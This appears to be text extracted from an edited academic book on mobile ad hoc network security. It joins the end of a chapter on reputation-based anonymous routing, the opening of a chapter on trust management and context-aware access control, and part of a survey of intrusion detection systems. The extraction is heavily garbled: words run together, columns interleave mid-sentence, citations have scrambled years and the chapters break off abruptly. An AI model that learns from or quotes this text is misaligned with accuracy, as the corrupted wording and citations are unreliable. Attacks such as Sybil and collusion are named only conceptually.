iour that can be taken into consideration during
∑
L −1
DV = i =0 ( RîV −RˆVi +1 ) 2 (9) reputation building:
where R̂nO and R̂nV are estimators of autocor- • Forwarding: During network operations
relation function know as a convolution time series nodes are able to verify integrity of messages
evaluated for a linear and stationary system, such anonymously forwarded in behalf of them
as a reputation system: by overhearing the first intermediate node.
Every message tampering, delays, double

relays, and dropping are detected as a mali- class of new attacks will appear focusing on the
cious behaviour. reputation system. Keeping in mind that the se-
• Receiving: Every obtained message that curity of the every system depends on its weakest
couldnotbesuccessfullyverified,point, repeated
the potential vulnerabilities of the reputation
messages and break down paths without error system may be treated as an important challenge
message notification coming form ved invol
for the future research. Two interesting forms of
immediate node should be treated as untrust- attacks for the reputation system may be Sybil
worthy. and Collusion attack. In the case- of first, the at
• Anonymous path establishing: In case tacker takes advantage of using multiple identities
of ANAP, an anonymous path establishing by adversary’s node, while in the second several
a three-pass process and in every phase malicious nodes are in collusion. In both cases it
multilayered operations are performed. By is highly possible that own experience and shared
default every request packet REQ should be reputation may be affected by these attacks. Pro-
forwarder only once by every node. In the posed by us, autocorrelation analysis for anomaly
case of detection of behaviour inconsistent detection in reputation recommendations may not
with this rules or obtaining multiple copies be sufficiently sensitive to cope with mentioned
of reply REP or error ERR messages, the attacks. Now, a statistical method validation of
reputation system should be informed. recommendation, such as the cross-validation
• Recommendation exchanging: Sharing a (Hildebrand et al., 1977), has been proposed and
reputation between nodes allows to compare is being developed. It is a very promising direc-
an own experience with a given by recom- tion of research, since the cross-validation is very
mending nodes. In the case when the one of exible
fl and easily applicable for complex data.
the votes differs much from the rest voters On the other hand, the method is mathematically
there exists presumption of node discrediting. rigorous,sotheobtainedresultsareverifiable
Additional statistical cross-validation (Hil- easy to implement.
debrand, Laing, & Rosenthal, 1977) methods Another interesting area is the secure routing
may be used for this case evaluation. in MANET enforced by an ontology-based reputa-
tion system (Caballero, Botia, & Gomez-Skarmeta,
The interaction of the presented reputation 2006). A conceptual-based reputation may be
system with the anonymous authentication proto- identifiedasareputationcreatedfordifferentt
col is performed ensuring the purely anonymous of services provided in MANET with an ability of
communication. The reputation information is creating a similarity measures between them. This
exchanged between nodes in on-demand manner approach in a natural way improves the model of
of interested node, encrypted by public key of incentives for the ad hoc communication giving
message originator. This ensures that recommen- ability to treat MANET networks as a service
dation sharing is hidden and may be read only by oriented.
legitimated recipients. At the moment several applications apart from
strict MANET paradigm take advantage of the
dynamic ad hoc routing phenomenon and make
futurE trEnds use of it in an akin to MANET wireless environ-
ments such as wireless mesh networks or vehicular
In the contemporary information society the mobile ad hoc networks (VANET). This example shows
ad hoc networks is a promising and very attractive that researching in the MANET’s area may bear
alternative for wireless access networks. Proposed unlimited applications.
in the last section, a solution for managing routing
in secure MANETs is based on the distributed
reputation system. We expect in the near future a

concludIng rEMArks Boukerche, A., El-Khatiba, K., Xua, L., & Korba,
L..)052An
( efficient secure distributed anony -
In this chapter we presented a new approach of mous routing protocol for mobile and wireless ad
distributed reputation-based secure routing mecha- hoc network. Computer Communications, 28(10),
nism in MANET. In the background section the 1193-1203.
main concepts of secure and anonymous mobile
Buchegger, S. (2005). Self-policing mobile ad hoc
ad hoc networks were presented. The overview
networks by reputation systems. IEEE Communi-
of applied authentication schemes in secure MA-
cations Magazine, 43(7), 101-107.
NET was analyzed giving an introduction to trust
management and reputation basis as a mean for Buchegger, S., & Le Boudec, J.-Y. (2002, June).
detecting misbehaviour and improving the routing Performance analysis of the CONFIDANT pro-
performance. tocol: Cooperation of nodes fairness in dynamic
In the main part of this chapter we focused on ad-hoc networks. In Proceedings of IEEE/ACM
a new proposal of a distributed reputation system, Symposium on Mobile Ad Hoc Networking and
which was an extension of the Liu and Issarny Computing (MobiHOC), Lausanne, Switzerland,
(2004) model and which was introduced in the (pp. 226-236).
anonymous authentication protocol for mobile ad
Caballero, A., Botia, J. A., & Gomez-Skarmeta,
hoc networks (Ciszkowski & Kotulski, 2006). We
A. F. (2006). A new model for trust and reputation
emphasized in the proposal the method of evaluat-
management with an ontology based approach for
ing recommendation reputation considering the
similarity between tasks. In K. Fischer, I. J. Timm,
past experience and recommendation reputation
E.André,N.& Zhong(Eds.,) Multi-agent System
of voters. We defined two types of the second-
Technologies, 4th German Conference, MATES
hand information, related to the immediate nodes
02 6 , Erfurt, Germany, (LNCS 4196, pp. 172-183).
and cumulative reputation, describing aggregated
Berlin: Springer.
reputation of immediate nodes’ neighbourhood.
Second-hand information is exchanged on demand Chaum, D. (1981). Untraceable electronic mail,
of interested nodes. In order to detect the malicious return addresses, and digital pseudonyms. Com-
activity and any anomalies in the information munications of the ACM, 24(2), 84-88.
exchange we incorporated the second-hand recom-
mendation validation by the statistical correlation Ciszkowski, T., & Kotulski, Z. (2006). ANAP:
approach. Anonymous authentication protocol in mobile ad
We pointed out the the security in MANET is hoc networks. Paper presented at the 10th Domestic
a primary concern for researchers, in particular Conference on Applied Cryptography ENIGMA,
this becomes a very important issue since several Warsaw, Poland, (pp. 191-203).
applications apart from strict MANET commu- Hildebrand, D. K., Laing, J. D., & Rosenthal, H.
nication model take advantage of the dynamic ad (1977). Predictionanalysisofcrossclassification .
hoc routing phenomenon. New York: John Wiley & Sons.
Hu, Y., & Perrig, A. (2004). A survey of secure
rEfErEncEs wireless ad hoc routing. IEEE Security & Privacy
Magazine, 2(3), 28-39.
Blaze, M., Feigenbaum, J., & Lacy, J. (1996). De- Hu, Y.-C., Perrig, A., & Johnson, D. B. (2005).
centralized trust management. In Proceedings of Ariadne: A secure on-demand routing protocol
the IEEE Symposium on Security and Privacy (p. for ad hoc networks. Wireless Networks, 11(1-2),
164). IEEE Xplore. 21-38.

Huang, C., Hu, H., & Wang, Z. (2006, September Liu, J., & Issarny, V. (2004, March 29-April 1).
3-6). A dynamic trust model based on feedback Enhanced reputation mechanism for mobile ad hoc
control mechanism for P2P applications. In L. T. networks. In C. Jensen, S. Poslad, & T. Dimitra-
Yang, H. Jin, J. Ma, & T. Ungerer (Eds.), Pro- kos (Eds.), Proceedings of Second International
ceedings of Third International Conference on Conference on Trust Management (iTrust 2004),
Autonomic and Trusted Computing ATC( , )0 2 6 Oxford, UK, (LNCS 2995, pp. 48-62). Berlin:
Wuhan, China, (LNCS 4158, pp. 312-321). Berlin: Springer.
Springer.
Mangipudi, K., Katti, R., & Fu, H. (2006). Authen-
Hussain, F., Chang, E., & Dillon, T. S. (2004, tication and key agreement protocols preserving
March)Classification
. oftrustinlogistic peer-International
anonymity. to- Journal of Network
peer communication. In Proceedings of the IEEE Security, 3(3), 259-270.
International Conference on Sciences of Elec-
Nilsson, N. J. (1986). Probabilistic logic. Artificial
tronic, Technologies of Information and Telecom-
Intelligence, 28(1), 71-87.
munications (SETIT 2004), Tousse, Tunisia.
Papadimitratos, P., & Haas, Z. (2002, January 27-
Johnson, D. B. (1994). Routing in ad hoc networks
31). Secure routing for mobile ad hoc networks. In
of mobile hosts. In Proceedings of IEEE Workshop
Proceedings of the SCS Communication Networks
on Mobile Computing Systems and Applications
and Distributed Systems Modelling and Simulation
(pp. 158-163). IEEE Press.
Conference (CNDS 2002), San Antonio, (pp.192-
Jøsang, A. (2002, July). Subjective evidential 204).
reasoning. In Proceedings of the th 9 Interna
-
Perkins, C., & Royer, E. (1999, February). Ad hoc
tional Conference on Information Processing and
on-demand distance vector routing. In Proceedings
Management of Uncertainty in Knowledge-Based
of the 2nd IEEE Workshop on Mobile Computing
Systems (IPMU 2002), Annecy, France.
Systems and Applications, New Orleans, (pp.
Kong, J., & Hong, X. (2003). ANODR: Anony- 90-100).
mous on demand routing with untraceable routes
Pfitzmann,A.Hansen,
&, M..)052 ( Anonymity,
for mobile ad-hoc networks. In Proceedings of
unobservability, pseudonymity, and identity man-
the 4th ACM International Symposium on Mobile
agement: A proposal for terminology. Retrieved
Ad Hoc Networking & Computing (MobiHoc03),
October 4, 2007, from http://dud.inf.tu-dresden.
Annapolis, MD, (pp. 291-302).
de/Literatur_V1.shtml
Kong, J., Hong, X., & Gerla, M. (2005). Mobil-
Royer, E., & Toh, C. (1999, April). A review of
ity changes anonymity: Mobile ad hoc networks
current routing protocols for ad hoc mobile wire-
need efficient anonymous routing. Proceed-In
less networks. IEEE Personal Communications,
ings of 10th IEEE Symposium on Computers and
6 (2), 46-55.
Communications (ISCC) 502 (pp. 57-62). IEEE
Computer Society. Sanzgiri, K., Dahill, B., Levine, B. N., Shields, C., &
Belding-Royer, E. M. (2002, November). A secure
Lee, K.-M., Hwang, K.-S., Lee, J.-H., & Kim, H.
routing protocol for ad hoc networks. In Proceed-
J. (2006, September). A fuzzy trust model using
ings of 10th IEEE International Conference on
multiple evaluation criteria. In L. Wang, L. Jiao,
Network Protocols (pp. 78-87). IEEE Press.
G. Shi, X. Li, & J. Liu (Eds.), Proceedings of Third
International Conference on Fuzzy Systems and Yang, H., Luo, H., Ye, F., Lu, S., & Zhang, L. (2004).
KnowledgeDiscovery(FSKD)026 (LNCS 4223, Security in mobile ad hoc networks: Challenges
pp. 961-969). Berlin: Springer. and solution. IEEE Wireless Communications,
11(1), 38-47.

Zapata, Z. G., & Asokan, N. (2002). Securing ad MANET: Mobile ad hoc network is a self-con-
hoc routing protocols. In Proceedings of ACM figuringnetworkoffreelymovingnodesconnected
Workshop on Wireless Security (WiSe 2002) (pp. by wireless links that can constitute a path joining
1-10). ACM Press. two arbitrary nodes of the network.
Zhang, Y., Liu, W., & Lou, W. W. (2005). Anony- Privacy: The ability of keeping secret some-
mous communications in mobile ad hoc networks one’s identity, resources, or actions. It is realized
(INFOCOM 2005). In Proceedings of 24th An- by anonymity and pseudonymity.
nual Joint Conference of the IEEE Computer and
Pseudonymity: Hides the user’s real identity be-
Communications Societies (Vol. 3, pp. 1940-1951).
hind some virtual identity called a pseudonym.
Proceedings IEEE.
Reputation: Perceived grade of trustworthiness
Zimmermann, J. (1994). PGP user’s guide. Cam-
to a particular peer created by their historical be-
bridge: MIT Press.
haviour during observations and interactions with
third party peers in the given context and time
Routing: A method of selecting a path (a chain
kEy tErMs of links between neighbouring nodes) from a source
node to a destination node. One can distinguish two
Anonymity: Aims at hiding an entity’s identity groups of protocols designed for MANET: reactive
completely. on-
( demand)andproactivetable- ( driven)The
. first
Anonymous Authentication: A method of type tries to resolve a path to a destination node
proving that someone has rights to certain ac- on the source node demand, whereas the second
tions or resources without disclosing the user’s approach is more preventive and continuously
real identity. keeps routing tables up to date by monitoring the
nearest neighbourhood.
Attacks: Attacks on MANET can destroy avail-
ability of nodes (attacks on routing) and contest Security: Security of a system means that the
reputation of nodes. system does exactly what it is designed to do and
nothing else, even in a case of attack. Secure MA-
Authentication: A method of proving some- NET enables reliable routing: privacy of communi-
one’s identity, especially if that someone is an cation with immediate degree of authentication of
authorized user of processes or resources. the parties of the information exchange process.
Collusion Attack: If a number of adversary Sybil Attack: When one adversary node uses
nodes make a coalition against reputation of other several identities to multiply its ability of rating
nodes. other nodes in MANET.
Cross-validation: A statistical method derived Trust: A subjective probability of a one peer
fromcross-classificationwhichmainobjective isparticular actions of another peer
(trustee) so that
to detect the outlying point in a population set. It is (trusted) they are willing and capable to perform
a candidate method for anomalies detection in the will be done according to trustee’s expectations
reputation sharing (recommendations) and regular in the given context and time
communication in MANET. Denial-of-Service
(DoS) attack: An attempt of keeping an access to VANET: A form of mobile ad hoc network, to
computer resources (nodes) unavailable, especially provide communications among nearby vehicles
by generating dummy traffic from one source and between vehiclesandnearbyfixedequipment,
(DoS) or a large number of sources (distributed usually described as roadside equipment.
DoS [DDoS]).
0

Chapter XXIX
Trust Management and
Context-Driven Access Control
Paolo Bellavista
University of Bologna, Italy
Rebecca Montanari
Daniela Tibaldi
Alessandra Toninelli
AbstrAct
The increasing diffusion of wireless portable devices and the emergence of mobile ad hoc networks promote
anytime and anywhere opportunistic resource sharing. However, the fear of exposure to risky interac-
tions is currently limiting the widespread uptake of ad hoc collaborations. This chapter introduces the
challenge of identifying and validating novel security models/systems for securing ad hoc collaborations,
by taking into account the high unpredictability, heterogeneity, and dynamicity of envisioned wireless
environments. We claim that the concept of trust management should become a primary engineering
designprinciple,toassociatewiththesubsequenttrustrefinementintoeffectivea
thus calling for original and innovative access control models. The chapter overviews the state-of-the-
art solutions for trust management and access control in wireless environments by pointing out both
the need for their tight integration and the related emerging design guidelines, that is, exploitation of
context awareness and adoption of semantic technologies.
Trust Management and Context-Driven Access Control
IntroductIon relationships with them. One of the most dif-

ficult security challenge in these environment
Wireless telecommunication systems and the is how to decide who to trust in the plethora of
Internet are converging towards an integrated opportunistically discovered entities. In addition,
distributed environment that permits users to MANET introduce a further level of complexity
access/share services and to collaborate anytime to secure collaborative applications: differently
and anywhere even when they are on the move. from traditional fixed networks where dedicate
The increasing diffusion of portable devices with nodes support basic networking functions, for
wireless connectivity and the emergence of mo- example, routing, in MANET these functions are
bile ad hoc networks (MANET) further promote carried out by available peers in the network, and
opportunistic and temporary resource sharing by there is no reason to assume that these peers will
enabling mobile users in physical proximity of each all cooperate uniformly. For instance, because
other to spontaneously form ad hoc communities network operations consume energy, some nodes
without the need to rely on the availability of a mayexhibitaselfishbehavioranddeny - theirco
fixednetworkinfrastructure.Mobilefilesharing, operation, thus leading to severe degradation of
mobile e-campus, emergency response, and vehicle network performance and functioning.
coordination are just few collaborative application To protect and/or provide incentives for any-
examples that illustrate the novel opportunities where and anytime collaborations, there is the
leveraged by envisioned and converged wired- need for appropriate security models/systems that
wireless networks of the future. Hereinafter we should follow novel design guidelines to take into
will indicate this integrated network computing account the high unpredictability, heterogeneity,
scenarioformedbyfixedInternethosts, andwireless
dynamicity of wireless Internet environ-
terminals and wireless access points in between, ments. In those scenarios where identities/roles
as well as by collections of wireless mobile hosts ofcollaboratingentitiesaredifficulttobea-pri
forming MANET without the aid of any established established, we claim that the concept of trust
fixedinfrastructure,withthecomprehensive should becometerma primary design principle for the
of wireless Internet. engineering of secure collaborative applications
However, the fear of exposure to risky inter- (Cahill, Gray, Seigneur, Jensen, Yong, Shand, et
actions (possibly compromising confidentiality, al., 2003; Capra, 2004; Kagal, Finin, Joshi, 2001;
availability, and integrity of both data and services) Ruohomaa & Kutvonen, 2005). Trust provides a
is currently limiting the widespread uptake of means to reduce the exposure to risky transactions
anywhere and anytime collaboration. To some in unfamiliar environments with no possibility to
extent, the above risk is present in any traditional offer absolute protection against potential dangers.
distributed collaborative setting, but the wireless Trust solutions allow entities to decide whether to
Internet exacerbates the perception of that risk accept or refuse the dangers presumably associated
because of the complex security challenges aris- with interactions with other entities. How to ac-
ing from the increased degree of openness and cess resources and to whom to grant permissions
dynamicity of the scenario. Collaborating partici- should depend on the trust degree that collaborating
pantsoftencannotbestaticallypreidentified; entities mutuallythey
have.
usually change frequently due to high mobility Using trust as the basis to support secure ad
and/or occasional failures, forming continuously hoc collaborations requires the design of novel
varying ad hoc coalitions with entities entering trust management frameworks that enable enti-
and leaving groups dynamically. At the same ties to form, maintain, and evolve trust opinions
time, roaming participants are often interested in highly dynamic wireless environments. In
in establishing opportunistic collaborations with fact, the wireless Internet deployment scenario
dynamically discovered partners, without having poses complex issues to trust management and
previous knowledge or long-term pre-established requires rethinking traditional solutions based

on assumptions that are unacceptable in these class principle that explicitly guides both policy
environments (Cahill et al., 2003; Capra, 2004). In specificationandenforcement;itisnotpossiblet
fact, in traditional distributed systems trust deci- defineapolicywithouttheexplicitspecificationo
sions can be delegated to centralized and trusted the context making the policy valid. The second
third parties with full visibility and control over main requirement is the full integration of novel
the whole trust management domain (most entities trust models/solutions with trust-dependent (pos-
arefixedandstaticallyknown).Onthecontrary, sibly context-aware) access control policies. That
in the wireless Internet the lack of both a globally integrationrepresentsthemostsignificantgoa
available trust management infrastructure and the state-of-the-art research in security for ad hoc
clearly defined administrative boundaries calls with currently only a very
wireless collaborations,
for fully decentralized and self-organized trust few proposals at an early stage.
solutions. Moreover, trust management solutions The achievement of secure, open, and dynamic
are effective as far as it is possible to bind trust wireless collaborations requires not only proper
opinions to security decisions. We claim that trust trust and access control models, but also shared
management should be considered as the key and interoperable vocabularies for trust and ac-
starting point for subsequent refinement cess control of trust specifications to avoid inconsist
into security policies related to authorization and interpretations. Some initial research efforts tend
security management. In particular, authorization to propose the adoption of ontological technologies
can be seen as the outcome of the refinement asasignificantof guidelinetowardcommonpolicy
trust relationships among strangers (Grandison & understanding (Kagal, Finin, & Joshi, 2003; Tonti
Sloman, 2000). et al., 2003; Uszok, Bradshaw, & Jeffers, 2004). Se-
Therefore, the issue of access control is also mantically rich representations of trust and access
crucial for the provisioning of anytime and any- control policies permit resource/context descrip-
where collaborative applications, and raises chal- tions at different levels of abstraction and enable
lenges similar to trust management, thus calling for reasoning about both structure and properties of
novel access control models. Only few proposals entities, context, and operations, thus enabling
are starting to emerge in that research area, by ad- exible
fl opportunitiesforpolicyanalysis,conflict
dressing two main needs. A primary requirement detection, and harmonization. It is worth noticing
is to design/develop access control solutions that that current security solutions for wireless Internet
take into account heterogeneity and dynamicity collaborations represent interesting steps forward,
of available services, computing devices, and user but are still more proof-of-concept prototypes of
characteristics. Along this direction, the emerging single aspects rather than comprehensive method-
design guideline for novel access control solutions ological and technical reference guides.
advocates a paradigm shift from subject-centric The goal of the chapter is to survey the most
access control models to context-centric ones (Cov- relevant support solutions in the literature by
ington, Long, Srinivasan, Dey, Ahamad, & Abowd, considering the two primary research directions
2001; Corradi, Montanari, & Tibaldi, 2004; Ko, emerging in the area, that is, trust management
Won, Shin, Choo, & Kim, 2006; Toninelli, Mon- and semantic context-driven access control. In
tanari, Kagal, & Lassila, 2006). Hereinafter, at a particular, examples of solutions in each category
highabstractionlevel,theterm“context” isdefined
will be presented in the Trust Management section
as any information that is useful for characterizing and the Semantic Context-driven Access Control
the state or the activity of an entity or the world section, respectively. The COMITY Framework
where this entity operates (Dey, Abowd, & Salber, section will focus on the main design choices of
2001). Differently from subject-centric solutions our trust-dependent context-aware middleware
where context is an optional element of policy proposal, with the aim of exemplifying the main
definition,simplyusedtorestrictthe applicability
concerns and solution guidelines about the inte-
scope of the permissions assigned to the subject, gration of trust and access control management.
in context-centric solutions context is the
Primary open first-
issues and expected directions of
evolution end the chapter.

trust MAnAgEMEnt tion, and management, but has not yet achieved
universally accepted techniques/tools, as detailed
The adoption of the concept of trust as the basisin the following.
for engineering secure collaborative applications
is currently attracting relevant research interests. Trust Definition and Properties
Trust has always been an important element in
theestablishmentofrelationships inmany
Trust fields.and multifaceted notion relat-
is a complex
Humans use trust daily to promote interaction ing to belief in the honesty, truthfulness, compe-
and to accept risk in situations where they have tence, and reliability of a trusted person or service
only partial information (Cahill et al., 2003). In (Grandison & Sloman, 2000). Currently there is
computing, the need for trust models and support no consensus in the literature on the meaning of
systems has recently grown with the widespread trust though several research activities recognize
Internet usage where transactions involve entities its importance. Due to the fact that trust is an in-
spanning a range of domains and organizations, tegral part of human nature, it is normally treated
not all of which may be trusted to the same extent. as an intuitive and universally understood concept.
Recently, trust issues have taken on more urgency However, by realizing that it is unwise to assume
due to wireless environments of emerging relevance it is an intuitive, universal, and well-understood
populated by a plethora of unknown and anonymous concept, many researchers have proposed differ-
users/devices. Entities can interact as far as they entdefinitionsoftrustandtheimportanceoftr
are able to autonomously assess trust and to use standardization is widely recognized (Frank &
this as the basis for automated decision making, Peters, 1998; Gambetta, 2001; Marsh, 1994; Staab,
for example, whether to use a service or whether However,
. )0 2 4 trustdefinitionsvarydepending
to permit access to resources. on researcher background and on addressed ap-
Incorporating trust in wireless Internet systems plication domain.
is important because trust can be an enabling Despite these differences, most proposals result
technology for application provisioning in open in having common basic properties. Trust is usu-
and dynamic environments in situations where we ally specified in terms of a relationship between
are given up complete control because traditional two entities that specifies the expectation of
security solutions are inadequate or even inappli- trust-assigning entity, called the trustor, about the
cable. For instance, certificate-based - authentica
actions of another entity (object of a trust estima-
tion and authorization mechanisms exhibit several tion)that, is,thetrustee,withinaspecifiedcont
limitations when deployed over ad hoc wireless (Grandison & Sloman, 2000). Entities bound by a
scenarios. First, they impose too much compu- trust relationship may be completely or partially
tational overhead especially ( due to certificate
unknown to each other.
validation), often intolerable for mobile devices Trust relationships may differentiate depending
with limited computational resources. Second, the on the number of entities involved. They include
transient nature of ad hoc collaborations does not one-to-one relationships between two entities,
justify the efforts of going through the laborious one-to-many in the case of one entity that needs
andexpensivecertificateissuanceprocess. to trust Finally,
a group, many-to-many in the case, for
the lack of central authority and network infra- example, of a committee, or many-to-one in the
structure in MANET, coupled with the dynamic case of departments trusting a head branch. In any
nature of the network topology, complicates the case, trust relationship is asymmetric: trustor and
adoption of certificate-based authentication trustee do not need andto have similar trust in each
authorization mechanisms. other even if they exploit the same information
Trust-related research has been carried out along as their basis to establish their trust relationship.
several different directions and has proposed many This derives from the observation, common to all
approachesfortrustdefinition,formation, - trust evolu
definitionproposals,thattrustisasubj
notion (Cahill et al., 2003).

A crucial characteristic of trust, especially in authorization. Trust between entities is typically

wireless collaborative environments, is that trust is established by means of credentials, such as digital
context-specific,thatis,trustattributes dependthat
certificates, on actasproofsofeithertheiden
the context where trust is evaluated. For instance, of credential owners or the membership of cre-
honestymightbemoresignificantfor-financial ap to a trusted group. For instance, a
dential owners
plications, whereas competence could be relevant digitalcertificateissuedbyacertificationauth
for medical applications. In addition, the trust level proves that a public key is owned by a particular
determined in one context does not directly transfer entity.Thecertificationauthorityvouchesfort
to another application domain. authenticity of the key owner’s identity. Credential-
Trust is also inherently linked to risk, typically based trust management solutions are designed to
with an approximate inverse relationship, where verify the authenticity of credentials and to deter-
risk is the probability of loss with respect to an minewhethercertaincredentialsaresufficient
interaction (English, Terzis, & Wagealla, 2004; performing a certain action, that is, to decide how
Josang & Presti, 2004; Marsh, 1994; Sloman, much to trust a given credential or its issuer/owner
2004). The riskier an activity is, the higher is the (Blaze, Feigenbaum, & Keromytis, 1998; Blaze,
trust level required to engage in the activity. The Feigenbaum, & Lacy, 1996; Chu, Feigenbaum,
analysis of the exact relationship between risk and LaMacchia, Resnick, & Strauss, 1997). These ap-
trust is a key issue for enabling cooperation, but proaches, however, have some limitations. They
there is still little work on risk analysis within trust do not precisely define how trust is built and do
management models. not provide any model/tool to support trust forma-
tion and evolution. For instance, PolicyMaker and
rust T Mangemt System KeyNote focus on access control issues based on
credential attributes rather than on trust evolution
Trust management is the activity of collecting, and reasoning issues. In addition, these trust man-
codifying, analyzing, evaluating, and reevaluat- agement solutions usually assume a static form of
ing evidence that relates to trust attributes with trust. Moreover, traditional approaches can be only
the purpose of making assessments and decisions deployed in centrally administered settings with
about trust relationships. Several solutions have mostlyfixedandknownentitieswhereacentralized
been proposed, each tailored to specific - comput
trusted authority stores information about involved
ing environments and focusing only on a subset entities (Blaze et al., 1996, 1998).
of trust management problems (Ruohomaa & To overcome the aforementioned limitations,
Kutvonen, 2005; Srinivasan, Teitelbaum, Liang, trust solutions have recently evolved to better
Wu, & Cardei, in press). The aim of this section take into account the characteristics of open and
is not to provide an exhaustive survey of all trust dynamic environments. The Sultan trust man-
management systems, but to overview some exem- agement framework provides a wider notion of
plar state-of-the-art solutions along their historical trust and allows the specification, analysis, an
evolution to point out how and to what extent they management of complex trust relationships. In
can address the heterogeneity and dynamicity of particular, it includes a language for describing trust
targeted wireless environments. The section also and recommendation relationships (Grandison &
examines the recent trust-related MANET research Sloman, 2003). In the Sultan model, a trustor can
work and outlines the novel research directions in specify whether a trusted entity can perform (or
thefieldoftrustmanagementthatprovide not)actionsusefulwhenassociatedwithaspecifictrus
guidelines for the design of appropriate models to level within aspecificcontext.Thetrustlevelis
secure wireless ad hoc collaborations. measure of belief in the honesty, competence, se-
The issue of trust has been initially studied in curity, and dependability of the trustee; the context
the area of distributed systems where it has been defines the conditions to satisfy to establish
faced in close association with authentication and trust relationship. The proposed approach requires

Cutting the Gordian Knot: Intrusion Detection Systems in Ad Hoc Networks
Figure5.ModularizedIDSarchitecture
ing is monitoring of user behavior. A host-based Distributed IDS

monitor module exists in every node; however,
network-based monitor exists only in a selected DistributedIDSdifferssignificantlyfrommobile
few. Decision making and response modules exist agent-based IDS. Zhang, Lee, and Huang (2003)
in every node. in their pioneering work propose a distributed
The entire ad hoc network is segregated into IDS. The IDS architecture as shown in Figure 6
clusters. Each cluster has a cluster-head, which consists of local and cooperative intrusion detection
runs the network-based monitoring. Therefore, engines. These detection engines are interfaced
packet-level monitoring is done by the cluster-head. with their respective response modules.
Individual nodes use the packet-level audits from A local intrusion detection system is a typi-
the cluster-head to improve the performance of the cal host-based IDS. The cooperative intrusion
host-based intrusion detection system. detection engine is used to decide globally about
The strength of this IDS architecture is augmen- a particular behavior pattern. Collection of all
tation of network-based IDS with host-based IDS. cooperative detection engines on all nodes form
The combination of these mechanisms has proved a global intrusion detection engine. Semantically,
veryefficientinconventionalIDS.Furthermore, the
Cooperative detection is analogous to network-
authors have eliminated the single point of failure based intrusion detection. However, global deci-
by distributing the cluster heads. This also distrib- sion on behavior patterns will not dominate local
utes the management load between cluster-heads decision. Nonetheless, global decision will aid local
of the network. Also, host-level basis of decision response. Few incorrect decisions about a behav-
making on an intrusion makes this approach robust ioral pattern will not affect the global decision as
against attacks on the IDS itself. more numbers of correct decisions will invalidate
However, the architecture’s trust on the clus- the incorrect decisions.
ter-head is its weak point. Malicious behavior of Local detection engine functions autonomously,
a cluster-head will lead to the compromise of all independent of other nodes’ detection engines. The
nodes under its control. In additions, similar to the cooperative engine will not aid the local-detection
other two mobile agent-based IDS, this architecture engine for identifying a malicious behavior pat-
assumes secure routing, which may not be true. tern. This prevents propagation of malicious or

Figure6.DistributedIDSarchitecture
wrong detection to other nodes. However, the local • Light-weightfirewalls

response to an attack is aided by the cooperative • Trafficpolicing
detection engine. Furthermore, a global response • Intrusion tolerant routing
is deduced by collecting information from vari- • Intrusion detection
ous local intrusion detection engines of all nodes • Flow monitoring
in the network. Eventually, this global response • Reconfigurationmechanisms
will be used for response action for that particular • Multipath routing
behavior pattern. • Source initiated route switching
Although global decision sharing is secure
comparing behavior-pattern sharing, the authors It aims to minimize the damage incurred on
did not discuss how local intrusion detection relies the ad hoc network by destructive attacks such as
on the global responses. Routing insecurity pro- DoS, distributed denial of service (DDoS), and
vides the ability to an attacker to create nonexistent so forth. Routing and data traffic are protected
nodes. Therefore, the attacker can emulate mali- by TIARA. TIARA is a distributed framework.
cious behavior for these nonexistent nodes. Thus, TIARAisahighlyefficientcross-layerintrusion
the real majority of benign nodes will not help to prevention and detection mechanism. Exploring
guarantee security of the distributed IDS each of these techniques is beyond the scope of
this chapter. Mishra has briefly discussed these
Methodologies techniques in his survey of ad hoc IDS.
However, it should be noted that intrusion de-
TIARA tection is a module in the collection of techniques.
Theoperationalefficiencyoftheintrusiondetect
Techniques for intrusion-resistant ad hoc rout- is unknown. Furthermore, tolerance to attacks is
ing algorithms (TIARA) essentially an intrusion not the fundamental goal of an intrusion detection
prevention model (Ramanujan, Ahamad, Bon- system. Unless the attackers are eliminated from the
ney, Hagelstrom, & Thurber, 2000). TIARA is a networkortheattackisidentifiedandsegregat
conglomeration of innovative techniques which from benign traffic, the network is always under
provides: threat. Persistent attacks have high probability of
success. Therefore, immediate response to attack

is critical. TIARA has no response system for threshold, the node is discarded from any path.
intrusions. This method is analogous to fault-tolerance in
typical routing algorithms. This method effectively
Threshold-Based Detection detects and responds to malicious packet drop-
ping attacks (sinks). However, it fails to address
A simplistic approach to ad hoc IDS is threshold- attacks such as route invasion, route disruption,
based detection. Bhargava and Agrawal (2001) and so forth.
propose an ad hoc IDS which prevents internal at-
tacks (attacks within the network). Internal attacks State-Based Anomaly Detection
are exhibited by nodes belonging to the network
which behave maliciously, either by themselves One of the interesting approaches in conventional
or when compromised. Each node maintains a IDS models are state-based intrusion detection.
local variable called “MalCount” for every other Michael and Ghosh (2000) incorporate a state-
node, which is increased for a particular node if its based model in ad hoc intrusion detection. They
behavior is suspicious. Thus the MalCount array propose two anomaly detection methodologies,
in a node tracks the level or state of suspicion that whichusefinite-statemachines(FSM)FSM . have
the host node has regarding the other nodes. Each proved successful in conventional IDS because of
node shares its local state of suspicion with respect their adaptability and dynamic learning capability
to a particular node with other nodes in the network of new attacks.
using a special packet REMAL. When a node Anomaly detection methods proposed by Mi-
receives REMAL, it increases its local MalCount chael and Ghosh (2000) used protocol states. In
for the particular node under suspicion. the first method, the sequence and frequency of
The authors overlooked many aspects of ad hoc protocolstatesaremonitored.Intrusionisaffirm
security. First, malicious knowledge sharing using whenaparticularsequencedeviatessignificant
REMAL will have cumulative malign effect on from normal behavior patterns or the frequency of
the network. Second, the security of the REMAL states exceeds a threshold. To increase robustness,
packet is unknown. Eventually, the entire network their second approach uses probabilistic state-based
can be under threat by trusting unreliable REMAL intrusion detection. Each occurrence of a suspi-
packets. The crucial aspect of the security of the cious protocol state increases the probability of
IDS is not considered in this methodology. Fur- the behavior being malicious.
thermore, routing security is not addressed. These two approaches are well suited for trans-
Another interesting approach called watchdog- port and application layer protocols, which have
pathrater, which also uses threshold, is proposed many protocol states, and the protocol states are
by Sergio, Giuli, Kevin, and Mary (2000). Watch- predictable. For example, attacks such as, TCP SYN
dog-pathrater, as the name implies, has a monitor ood
fl attackcanbedetectedusingthisapproach.
and evaluator. Unlike Bhargava and Agrawal’s However, this is not true in the case of routing
(2001) approach, Watchdog-pathrater functions protocols. State sequence or frequency of states
independently and does not share information does not distinguish a malicious behavior from
with other nodes. When a packet is forwarded to a benign one. Traditionally, FSM were used to
a neighbor node, the forwarding node listens and extract semantics from user behavior through
monitors how the node behaves upon receiving application-layer protocols. In the case of ad hoc
a packet. A benign node will forward faithfully, routing protocols, semantics is not represented by
which is overheard by the monitor. However, when protocol states, but factors such as current topology,
the node does not forward the packet, the pathrater mobility, connectivity, and so forth are.
increases the failure rate for the path. The monitor
